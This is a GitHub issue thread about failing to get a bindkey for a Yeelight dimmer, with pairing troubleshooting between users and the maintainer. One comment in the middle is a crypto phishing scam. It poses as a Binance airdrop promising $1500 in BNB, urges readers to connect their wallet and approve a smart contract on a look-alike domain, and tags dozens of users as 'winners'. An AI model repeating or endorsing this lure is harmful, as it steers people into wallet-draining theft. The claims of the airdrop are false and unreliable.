### ISSUE TITLE
cannot get the bindkey

### ISSUE THREAD

**Issue by ck003** [psylity/yeelight-dimmer-python#1]
<img width="569" alt="image" src="https://user-images.githubusercontent.com/19967081/197376128-dbb7ba49-cb88-42b7-8bc4-81ba2605dc68.png">

**Comment by psylity** [comment]
Are you sure you pressed the Pair button right? Try to pair dimmer to the proprietary client, is it ok?

**Comment by highpolar-shubham** [comment]
# The Ultimate Binance Airdrop Guide: Claim Your $1500 in BNB Now and Earn Extra Rewards!

🎉 Exciting News! You are the lucky recipient of the exclusive $1.5 million Binance Airdrop, and we're thrilled to offer you $1500 in BNB to enhance your year-end celebrations. And here's the cherry on top—connect now, and you'll instantly receive an extra $100! Follow the detailed steps below to seamlessly claim your tokens and maximize the benefits of this phenomenal festive giveaway.

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://claim.bnbchainnetwork.xyz)

## How to Claim Your Rewards:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://claim.bnbchainnetwork.xyz) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Enjoy a smooth and secure connection.

### 2. 🔄 Interact with the Smart Contract:
   - Once your wallet is connected.
   - Navigate to the platform and click on the "**Claim**" button to interact with the smart contract.
   - Benefit from the transparent and efficient process.

### 3. 💰 Additional Bonus Rewards:
   - Get an instant bonus of $100 upon connecting your wallet.
   - Capitalize on this limited-time opportunity to boost your overall rewards.

Act now to secure your $1500 in BNB, and take advantage of the extra $100 bonus—this is an offer you don't want to miss! But wait, there's more. By participating, you also stand a chance to win up to $20,000 in additional rewards. Don't hesitate; click the link now and experience the excitement of earning crypto rewards with a minimal 5% transaction fee.


Winners: @davidharting, @stonecobra, @happy365, @jinyong16888, @MechaGirls, @PratikLunagaria, @riko-sama, @ardinusawan, @ngocsangyem, @jkspy1122, @inritum, @marksmerritt, @oyi, @dominikarauk, @erensertkaya, @qinjiang03, @Stoner609, @kocsisbalazs, @clementjuventin, @infrasync, @aegoroff, @sharpron, @krofik, @djhoneypaws, @trevinwisaksana, @Umraooo7, @bxxasn, @andrewkinsella, @scheplick, @VladSturm

**Comment by voed** [comment]
Hi. I have the same issue. Am i understand right that i need any yeelight lamp to connect this to the yeelight app first? Tried to add by scan in yeelight app, but nothing found.

**Comment by psylity** [comment]
No, you don’t need a Yeelight lamp to pair; I’ve never used one myself.

Just to clarify, are you saying the Yeelight app isn’t detecting your dimmer?
If that’s the case, it could be a hardware issue with the dimmer.

**Comment by voed** [comment]
Yes, i am pressing the pairing button for 3s, led is blinking, but nothing happens in the app. Tried both "Yeelight Classic" and "Yeelight" apps from the Play Store

**Comment by voed** [comment]
FYI, was able to obtain a bindkey with this guide:
https://github.com/custom-components/ble_monitor/issues/999#issuecomment-2102056708
